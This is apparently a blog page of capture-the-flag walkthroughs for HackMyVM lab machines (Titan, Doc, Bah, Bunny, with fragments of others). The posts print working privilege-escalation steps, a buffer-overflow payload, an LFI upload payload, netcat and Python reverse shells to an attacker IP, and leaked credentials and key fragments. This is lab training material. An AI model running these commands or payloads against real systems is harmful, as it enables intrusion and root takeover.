<pre><code class="language-bash"> henry@hopper:~$ sudo -l
 Matching Defaults entries for henry on hopper:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User henry may run the following commands on hopper:
     (root) NOPASSWD: /usr/bin/ascii-xfr</code></pre>
<p>Use ascii-xfr to create a authorzied_keys of root.</p>
<p>```bash
henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys
ASCII download of "/root/.ssh/authorized_keys"</p>
<p>0.6 Kbytes transferred at 565 CPS... Done.</p>
<pre><code>
Login as root.

```bash
 ~ ssh root@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /root/.Xauthority does not exist
 root@hopper:~# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 hopper

HackMyVm Titan Walkthrough

发表评论

HackMyVm Titan Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Titan

Scan ports first.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for chronos.local (192.168.56.100)
 Host is up (0.00098s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 37:fa:d2:9f:20:25:cf:c5:96:7a:dc:f3:ff:2c:7a:22 (RSA)
 |   256 11:ad:fa:95:71:c5:f9:d4:97:da:42:03:2b:0f:55:bb (ECDSA)
 |_  256 fa:fb:04:13:93:90:a5:01:53:ba:6c:e9:bf:dc:bf:7e (ED25519)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80. found /robots.txt, then download athena.txt.

 ~ curl http://192.168.56.100/robots.txt
 gobuster-0 | 0 [14:29:34]
 /athena.txt

 ~ wget http://192.168.56.100/athena.txt

Use vim to open athena.txt, found some strange spaces and tabs.

image-20210829143154657.png

Through google "space tab steg", we know it's some crypto strings. And we can decrypt it with stegsnow. Then we get username and password of prometheus.

 ~ sudo apt install stegsnow
 stegsnow is already the newest version (20130616-6).
 ~ stegsnow -C athena.txt
 prometheus/iloveallhumans⏎

Log in ssh as prometheus, found a file named sacrifice in home folder.

 prometheus@titan:~$ ls -la
 total 52
 drwxr-xr-x 2 prometheus prometheus  4096 Aug 18 06:03 .
 drwxr-xr-x 5 root       root        4096 Aug  9 14:23 ..
 -rw------- 1 prometheus prometheus  2718 Aug 18 05:01 .bash_history
 -rw-r--r-- 1 prometheus prometheus   220 Aug  9 14:23 .bash_logout
 -rw-r--r-- 1 prometheus prometheus  3526 Aug  9 14:23 .bashrc
 -rw-r--r-- 1 prometheus prometheus   807 Aug  9 14:23 .profile
 -rwsr-sr-x 1 root       prometheus 16896 Aug  9 14:29 sacrifice
 -rw------- 1 prometheus prometheus   102 Aug 18 05:51 .Xauthority

Disassemble sacrifice, we can know, if we input "beef", we can escalate to user with uid 1000 (0x03E8).

 int __cdecl main(int argc, const char **argv, const char **envp)
 {
   char s1[72]; // [rsp+10h] [rbp-50h] BYREF
   int v6; // [rsp+5Ch] [rbp-4h]

   v6 = 1000;
   printf("What is your offer to the gods?");
   gets(s1);
   if ( strcmp(s1, "beef") )
   {
     printf("Thanks, mortal.");
   }
   else
   {
     setuid(0x3E8u);
     setgid(0x3E8u);
     printf("Take this gift.");
     system("/bin/bash");
   }
   return 0;
 }

Now we can escalate to user zeus.

 prometheus@titan:~$ ./sacrifice
 What is your offer to the gods?beef
 zeus@titan:~$ id
 uid=1000(zeus) gid=1001(prometheus) groups=1001(prometheus)

Check sudo -l.

zeus@titan:~$ sudo -l
 Matching Defaults entries for zeus on titan:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User zeus may run the following commands on titan:
     (hesiod) NOPASSWD: /usr/bin/ptx

Check help manual of ptx, then we can use ptx to read /home/hesiod/.ssh/id_rsa.

```bash
zeus@titan:/home/zeus$ sudo -u hesiod ptx /home/hesiod/.ssh/id_rsa -A -G
.xx "PRIVATE/" "" "-----BEGIN OPENSSH" "" "/home/hesiod/.ssh/id_rsa:1"
.xx "PRIVATE/" "" "-----END OPENSSH" "" "/home/hesiod/.ssh/id_rsa:27"
.xx "" "" "/JT+LbNag1ZqqNu02YET846I1xppdx/gYK5/hW19Shrw0F+V+G2U0AaVxfgFb+B2Sz+QER" "" "/home/hesiod/.ssh/id_rsa:16"
...
.xx "" "" "xUBZ868cu5Flrby84V8UpiXE+tPyq5bZUw24nlJTURFzqy0LkAcAtKQVihXaaoAlOJvz7z" "" "/home/hesiod/.ssh/id_rsa:22"
.xx "" "" "xqQSsiROLKN/zVEXAAAADGhlc2lvZEB0aXRhbgECAwQFBg==" "" "/home/hesiod/.ssh/id_rsa:26"


Paste line by line in order into a new key file, chmod 600, then we can login as hesiod with private key.

```bash
 ~ ssh hesiod@192.168.56.100 -i id_rsa                                                                   ...
 Last login: Wed Aug 18 05:51:27 2021 from 192.168.56.150
 hesiod@titan:~$ id
 uid=1002(hesiod) gid=1002(hesiod) groups=1002(hesiod)
 hesiod@titan:~$</code></pre>
<p>In /home/hesiod, we found a file named fire. It's writable.</p>
<pre><code class="language-bash">hesiod@titan:~$ ls -la
 total 56
 drwxr-xr-x 4 hesiod hesiod  4096 Aug 18 02:11 .
 drwxr-xr-x 5 root   root    4096 Aug  9 14:23 ..
 -rw------- 1 hesiod hesiod  1265 Aug 18 01:51 .bash_history
 -rw-r--r-- 1 hesiod hesiod   220 Aug  9 14:23 .bash_logout
 -rw-r--r-- 1 hesiod hesiod  3526 Aug  9 14:23 .bashrc
 -rwxr-x--- 1 hesiod hesiod 16608 Aug  9 14:27 fire
 drwxr-xr-x 3 hesiod hesiod  4096 Aug  9 14:25 .local
 -rw-r--r-- 1 hesiod hesiod   807 Aug  9 14:23 .profile
 drwx------ 2 hesiod hesiod  4096 Aug  9 14:31 .ssh
 -rw------- 1 hesiod hesiod   102 Aug 18 02:11 .Xauthority</code></pre>
<p>Now here is the key point to root.</p>
<p>Go back to sacrifice, in disassembler, just scroll up a little, we can found a secret function named "thief".</p>
<p>```bash
.text:0000000000001185                 public thief
.text:0000000000001185 thief           proc near
.text:0000000000001185 ; <strong>unwind {
.text:0000000000001185                 push    rbp
.text:0000000000001186                 mov     rbp, rsp
.text:0000000000001189                 mov     edi, 0          ; uid
.text:000000000000118E                 call    _setuid
.text:0000000000001193                 mov     edi, 0          ; gid
.text:0000000000001198                 call    _setgid
.text:000000000000119D                 lea     rdi, command    ; "/home/hesiod/fire"
.text:00000000000011A4                 call    _system
.text:00000000000011A9                 nop
.text:00000000000011AA                 pop     rbp
.text:00000000000011AB                 retn
.text:00000000000011AB ; } // starts at 1185
.text:00000000000011AB thief           endp
.text:00000000000011AB
.text:00000000000011AC
.text:00000000000011AC ; =============== S U B R O U T I N E =======================================
.text:00000000000011AC
.text:00000000000011AC ; Attributes: bp-based frame
.text:00000000000011AC
.text:00000000000011AC ; int __cdecl main(int argc, const char <strong>argv, const char </strong>envp)
.text:00000000000011AC                 public main
.text:00000000000011AC main            proc near               ; DATA XREF: _start+1D↑o
.text:00000000000011AC
.text:00000000000011AC var_60          = qword ptr -60h
.text:00000000000011AC var_54          = dword ptr -54h
.text:00000000000011AC s1              = byte ptr -50h
.text:00000000000011AC var_8           = dword ptr -8
.text:00000000000011AC var_4           = dword ptr -4
.text:00000000000011AC
.text:00000000000011AC ; </strong>unwind {
.text:00000000000011AC                 push    rbp
.text:00000000000011AD                 mov     rbp, rsp
.text:00000000000011B0                 sub     rsp, 60h
.text:00000000000011B4                 mov     [rbp+var_54], edi
.text:00000000000011B7                 mov     [rbp+var_60], rsi</p>
<pre><code>
Through reading the source code, we get the final method:

We need to overflow sacrifice, then run secret function "thief", "thief" then calls /home/hesiod/fire, and write shellcode in fire to get root.

To successfully pwn sacrifice, first step is to calcute the offset of overflow point. Download sacrificeto local machine, and use gdb-peda to load it. 

Create pattern string with length 200.

```bash
 gdb-peda$ pattern create 200
 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

Input 'r' to let program run, when ask for input answer, paste the above pattern string.

 gdb-peda$ r
 Starting program: /home/kali/Documents/titan/sacrifice
 What is your offer to the gods?AAA%AAsA...

Then we will get Segmentation fault, because return address is illegal.

Program received signal SIGSEGV, Segmentation fault.
 [----------------------------------registers-----------------------------------]
 ...
 RSP: 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 RIP: 0x55555555524a (<main+158>:        ret)
 ...
 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
 [-------------------------------------code-------------------------------------]
    0x55555555523f <main+147>:   call   0x555555555040 <printf@plt>
    0x555555555244 <main+152>:   mov    eax,0x0
    0x555555555249 <main+157>:   leave  
 => 0x55555555524a <main+158>:   ret    
    0x55555555524b:      nop    DWORD PTR [rax+rax*1+0x0]
    0x555555555250 <__libc_csu_init>:    push   r15
    0x555555555252 <__libc_csu_init+2>:  mov    r15,rdx
    0x555555555255 <__libc_csu_init+5>:  push   r14
 [------------------------------------stack-------------------------------------]
 0000| 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 0008| 0x7fffffffe4f0 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 ...
 [------------------------------------------------------------------------------]
 Legend: code, data, rodata, value
 Stopped reason: SIGSEGV
 0x000055555555524a in main ()

Use "patter search" to get the offset is 88 for [RSP]. And [RSP] points to the original return address, which we want to overflow with our own return address.

 gdb-peda$ pattern search
 Registers contain pattern buffer:
 RBP+0 found at offset: 80
 Registers point to pattern buffer:
 [RSP] --> offset 88 - size ~112
 [R8] --> offset 0 - size ~212
 ...

The method is, we need to fill 87 chars, then following the address of secret function "thief", which is 0x555555555185. (Maybe not the same on your machine).

```bash
gdb-peda$ disassemble 0x555555555185
Dump of assembler code for function thief:
0x0000555555555185 <+0>: push rbp
0x0000555555555186 <+1>: mov rbp,rsp
0x0000555555555189 <+4>: mov edi,0x0
0x000055555555518e <+9>: call 0x555555555080 <setuid@plt>
0x0000555555555193 <+14>: mov edi,0x0
0x0000555555555198 <+19>: call 0x555555555070 <setgid@plt>
0x000055555555519d <+24>: lea rdi,[rip+0xe64] # 0x555555556008
0x00005555555551a4 <+31>: call 0x555555555030 <system@plt>
0x00005555555551a9 <+36>: nop
0x00005555555551aa <+37>: pop rbp
0x00005555555551ab <+38>: ret
End of assembler dump.


Because intel machine is little-Endian, so the 64bit address of 0x555555555185 should be <code>"\x85\x51\x55\x55\x55\x55\x00\x00" in python string format.

We write reverse shell code in /home/hesiod/fire as user hesiod, remember to add +x in order to let prometheus has execute permission.

```bash
 hesiod@titan:~$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > fire
 hesiod@titan:~$ chmod +x fire
 hesiod@titan:~$ ls -la fire
 -rwxr-x--x 1 hesiod hesiod 36 Aug 18 06:05 fire

Then back to user prometheus, use python to generate the evil string and pwn sacrifice.

 prometheus@titan:~$ python3 -c 'print("a"*87+"\x85\x51\x55\x55\x55\x55\x00\x00")' |./sacrifice
 ────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234  
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:47256.
 id
 uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
 cd /root
 id;hostname
 uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
 titan

HackMyVm Doc Walkthrough

发表评论

HackMyVm Doc Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Doc

Scan ports, only port 80 is open.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bah.hmv (192.168.56.100)
 Host is up (0.00070s latency).
 Not shown: 65534 closed ports
 PORT   STATE SERVICE VERSION
 80/tcp open  http    nginx 1.18.0
 | http-cookie-flags:
 |   /:
 |     PHPSESSID:
 |_      httponly flag not set
 |_http-server-header: nginx/1.18.0
 |_http-title: Online Traffic Offense Management System - PHP

Check port 80, it's Online Traffic Offense Management System. Google the exploit, and add doc.hmv to /etc/hosts.

https://www.exploit-db.com/exploits/50221

Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Use the POC to get user shell.

```bash
~ (p2) python 50221.py
Example: http://example.com
Url: http://doc.hmv
Check Url ...
[+] Bypass Login
[+] Upload Shell
[+] Exploit Done!
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Because this shell is not full functional, we spawn another reverse shell.

```bash
 $ nc 192.168.56.150 1234 -e /bin/bash
 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:44802.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 python3 -c 'import pty;pty.spawn("/bin/bash")'

Found the password for user bella.

www-data@doc:~/html/traffic_offense$ cat initialize.php
 cat initialize.php
 <?php
 $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
 if(!defined('base_url')) define('base_url','http://doc.hmv/');
 if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
 if(!defined('dev_data')) define('dev_data',$dev_data);
 if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
 if(!defined('DB_USERNAME')) define('DB_USERNAME',"bella");
 if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"be114yTU");
 if(!defined('DB_NAME')) define('DB_NAME',"doc");
 ?>

Escalate to user bella.

```bash
www-data@doc:~/html/traffic_offense$ su bella
su bella
Password: be114yTU

bella@doc:/var/www/html/traffic_offense$ id
id
uid=1000(bella) gid=1000(bella) groups=1000(bella),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
bella@doc:/var/www/html/traffic_offense$


Check local port, port 21 is actually ssh, so we portforword it outside.

 ```bash
bella@doc:/$ ss -ntlp
 ss -ntlp
 State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
 LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
 LISTEN 0      511          0.0.0.0:80        0.0.0.0:*          
 LISTEN 0      128        127.0.0.1:21        0.0.0.0:*          
 LISTEN 0      511             [::]:80           [::]:*          
 bella@doc:/$ socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 [1] 571

Check sudo -l.

```bash
bella@doc:~$ sudo -l
Matching Defaults entries for bella on doc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bella may run the following commands on doc:
(ALL : ALL) NOPASSWD: /usr/bin/doc


Disassemble doc, we know it's actually pydoc3.9.

 ```bash
; Attributes: bp-based frame
 ; int __cdecl main(int argc, const char **argv, const char **envp)
 public main
 main proc near
 ; __unwind {
 push    rbp
 mov     rbp, rsp
 lea     rdi, command    ; "/usr/bin/pydoc3.9 -p 7890"
 call    _system
 nop
 pop     rbp
 retn
 ; } // starts at 1135
 main endp

Google exploit of pydoc.

https://bugs.python.org/issue42988

Start doc server.

 bella@doc:/$ sudo doc
 sudo doc
 Server ready at http://localhost:7890/
 Server commands: [b]rowser, [q]uit
 server>

In another term, we login ssh as user bella, and get the ssh key of root.

 ~ ssh bella@192.168.56.100 -p 5000      
 bella@192.168.56.100's password:
 ...
 Last login: Thu Aug 26 21:33:08 2021 from 127.0.0.1
 bella@doc:~$ curl http://localhost:7890/getfile?key=/root/.ssh/id_rsa
 ...
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEA6EoSPtXiFtzobkdXCemyu+inUAHe1+tAWvDEEpUSOYXVTDZXUhsA
 qJ0B8PP+/i2gJb4ROUpuDJ6e8Ca1UYJdKFX47f5g0BRM+S5ZLueQDjv66Di7MukuKaLzq7
 LapI7QvuPNStnZsolvixn0urFfKBQWJ2x3DGXcZCUWx37G7Ip8FawmF7OAkD5+R+0PucRz
 ...
 s1R6k834FA4RfIpakszn95GJQKVbuJrK/rbl3FVMJ/Q2RiiXPkEmfhoYJFSpp+8I9cJQkz
 uQ1x5zlzTqI5n3AAAACHJvb3RAZG9jAQI=
 -----END OPENSSH PRIVATE KEY-----

Login ssh as root.

 ~ ssh root@192.168.56.100 -p 5000 -i key
 root@doc:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 doc
 root@doc:~#

HackMyVm Bah Walkthrough

发表评论

HackMyVm Bah Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bah

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log  
 ...
 PORT     STATE SERVICE VERSION
 80/tcp   open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: qdPM | Login
 3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
 ...

Open port 80 in web browser, it shows qdPM v9.2 login panel. Google that it may leak credentials.

# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
 # Date: 03/08/2021
 # Exploit Author: Leon Trappett (thepcn3rd)
 # Vendor Homepage: https://qdpm.net/
 # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
 # Version: 9.2
 # Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

 The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

Download databases.yml, get login name and password.

```bash
~ wget http://192.168.56.100/core/config/databases.yml
~ cat databases.yml
...
username: qpmadmin
password: "<?php echo urlencode('qpmpazzw') ; ?>"


Login 3306, get a url list.

 ```bash
~ mysql -h 192.168.56.100 -p3306 -u qpmadmin -p
 ...
 +----+-------------------------+
 | id | url                     |
 +----+-------------------------+
 |  1 | http://portal.bah.hmv   |
 |  2 | http://imagine.bah.hmv  |
 |  3 | http://ssh.bah.hmv      |
 |  4 | http://dev.bah.hmv      |
 |  5 | http://party.bah.hmv    |
 |  6 | http://ass.bah.hmv      |
 |  7 | http://here.bah.hmv     |
 |  8 | http://hackme.bah.hmv   |
 |  9 | http://telnet.bah.hmv   |
 | 10 | http://console.bah.hmv  |
 | 11 | http://tmux.bah.hmv     |
 | 12 | http://dark.bah.hmv     |
 | 13 | http://terminal.bah.hmv |
 +----+-------------------------+
 13 rows in set (0.001 sec)

And a users list.

 MariaDB [hidden]> select * from users;
 +----+---------+---------------------+
 | id | user    | password            |
 +----+---------+---------------------+
 |  1 | jwick   | Ihaveafuckingpencil |
 |  2 | rocio   | Ihaveaflower        |
 |  3 | luna    | Ihavealover         |
 |  4 | ellie   | Ihaveapassword      |
 |  5 | camila  | Ihaveacar           |
 |  6 | mia     | IhaveNOTHING        |
 |  7 | noa     | Ihaveflow           |
 |  8 | nova    | Ihavevodka          |
 |  9 | violeta | Ihaveroot           |
 +----+---------+---------------------+
 9 rows in set (0.001 sec)

Make a dic with the url and enum vhost. All urls are OK, but party.bah.hmv returns the minimum size.

 ~ gobuster vhost -u bah.hmv  -w  dic                                                                    
 ===============================================================
 2021/08/22 10:38:10 Starting gobuster in VHOST enumeration mode
 ===============================================================
 Found: party.bah.hmv (Status: 200) [Size: 5216]
 Found: imagine.bah.hmv (Status: 200) [Size: 5659]
 Found: portal.bah.hmv (Status: 200) [Size: 5657]
 Found: hackme.bah.hmv (Status: 200) [Size: 5657]
 Found: telnet.bah.hmv (Status: 200) [Size: 5657]
 Found: dev.bah.hmv (Status: 200) [Size: 5651]    
 Found: ssh.bah.hmv (Status: 200) [Size: 5651]    
 Found: here.bah.hmv (Status: 200) [Size: 5653]  
 Found: ass.bah.hmv (Status: 200) [Size: 5651]    
 Found: console.bah.hmv (Status: 200) [Size: 5659]
 Found: tmux.bah.hmv (Status: 200) [Size: 5653]  
 Found: dark.bah.hmv (Status: 200) [Size: 5653]  
 Found: terminal.bah.hmv (Status: 200) [Size: 5661]

Add party.bah.hmv into /etc/hosts, and visit port 80 again, we get a shell interface. Login with the credentials from yml file.

image-20210822104716708.png

This web shell is OK, so we don't need to spawn a reverse shell.

In /home, found another user rocio, escalate to user rocio with password we get from database.

 qpmadmin@bah:/home/rocio$ su rocio
 Password:
 rocio@bah:~$ id
 uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Check pspy. Notice an interesting command of shellinaboxd.

 2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Bl
 ack on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disa
 ble-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev

From the github help of shellinabox, we can know /devel:root:root:/:/tmp/dev means if we visit http://xxxx/devel, we will run /tmp/dev as root.

So we create shell code in /tmp/dev.

 ~ echo 'nc 192.168.56.150 1234 -e /bin/bash' >/tmp/dev
 ~ chmod +x /tmp/dev

When we visit http://party.bah.hmv/devel/ from web browser, we will get reverse shell.

 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59154.
 id
 uid=0(root) gid=0(root) groups=0(root)

HackMyVm Bunny Walkthrough

发表评论

HackMyVm Bunny Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bunny

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                      
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan dirs.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,4
03,404,500 --wildcard -o 80.log

/upload.php (Status: 200) [Size: 27305]
/password.txt (Status: 200) [Size: 537]
/index.php (Status: 200) [Size: 25]
/config.php (Status: 200) [Size: 24691]
/phpinfo.php (Status: 200) [Size: 95622]


After checking all files, nothing interesting. Next fuzz if index.php get some params.

```bash
 ~ wfuzz -u 'http://192.168.56.100/index.php?FUZZ=/etc/passwd' --hh 25  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000013357:   200        31 L     43 W       1508 Ch     "page"

Fuzz local files, but found nothing useful.

~ wfuzz -u 'http://192.168.56.100/index.php?page=FUZZ'  --hh 25  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt                  
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000001:   200        31 L     43 W       1508 Ch     "/etc/passwd"
 000000005:   200        231 L    1117 W     7249 Ch     "/etc/apache2/apache2.conf"
 000000004:   200        17 L     42 W       426 Ch      "/etc/anacrontab"
 000000015:   200        26 L     192 W      1067 Ch     "/etc/crontab"
 ...

Now we get an php file with LFI, and phpinfo file whose file_uploads is on. It's a famous vulnerability.

Download poc from https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py and modify payload code.

      PAYLOAD="""%s\r$                                                                                                                                    
     9 <?php file_put_contents('/tmp/g', '<?php system("nc 192.168.56.150 1234 -e /bin/bash"); ?>')?>\r""" % TAG$

Run poc, now shell has been uploaded to /tmp/g.

```bash
~ (p2) python exp.py 192.168.56.100 80 vim-0 | 0 [13:38:55]
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 137073
Spawning worker pool (10)...
51 / 1000
Got it! Shell created in /tmp/g

Woot! \m/
Shuttin' down...


Listen to port 1234 and runs the /tmp/g through LFI.

 ```bash
~ curl 'http://192.168.56.100/index.php?page=/tmp/g'                                                    
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49970.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, we found user chris and a file named magic.

 www-data@bunny:/home/chris/lab$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on bunny:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on bunny:
     (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
 www-data@bunny:/home/chris/lab$ cat magic
 cat magic
 #/bin/bash
 $1 $2 $3 -T -TT 'sh #'
 www-data@bunny:/home/chris/lab$

Check online notes from https://gtfobins.github.io/gtfobins/zip/, we see zip can spawn a shell use the cmd in magic file.

 Shell

 It can be used to break out from restricted environments by spawning an interactive system shell.

     TF=$(mktemp -u)
     zip $TF /etc/hosts -T -TT 'sh #'
     rm $TF

Escalate to user chris.

 www-data@bunny:/home/chris/lab$ sudo -u chris /bin/bash /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
 <h /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
   adding: etc/hosts (deflated 30%)
 $ id
 id
 uid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

Create /home/chris/.ssh, upload id_rsa.pub, rename to authorized_keys, chmod 600, then we can get ssh login.

Found writable file.

```bash
chris@bunny:~$ find / -writable -not -path "/proc*" 2>/dev/null
/home/chris
...
/usr/lib/python3.7/random.py
/tmp
...


Found /opt/pendu.py which imports random.py.

 ```bash
chris@bunny:~$ cd /opt
 chris@bunny:/opt$ ls -la
 total 12
 drwxr-x---  2 root chris 4096 juil. 31 10:25 .
 drwxr-xr-x 18 root root  4096 juil. 31 09:00 ..
 -rw-r--r--  1 root root  1993 juil. 31 10:14 pendu.py
 chris@bunny:/opt$ cat pendu.py
 import random                    
 ...

Use pspy to check system calls.

 2021/08/17 06:53:01 CMD: UID=0    PID=1236   | /bin/sh -c /usr/bin/python3.7 /opt/pendu.py

Write python reverse shell code into random.py, and wait for the final root shell.

```bash
chris@bunny:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /usr/lib/python3.7/random.py
chris@bunny:~$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49976.
bash: impossible de régler le groupe de processus du terminal (1259): Ioctl() inapproprié pour un périphérique
bash: pas de contrôle de tâche dans ce shell
root@bunny:~# id;hostname;
id;hostname;
uid=0(root) gid=0(root) groupes=0(root)
bunny
root@bunny:~#

HackMyVm Zen Walkthrough

发表评论

HackMyVm Zen Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Zen

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100  
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
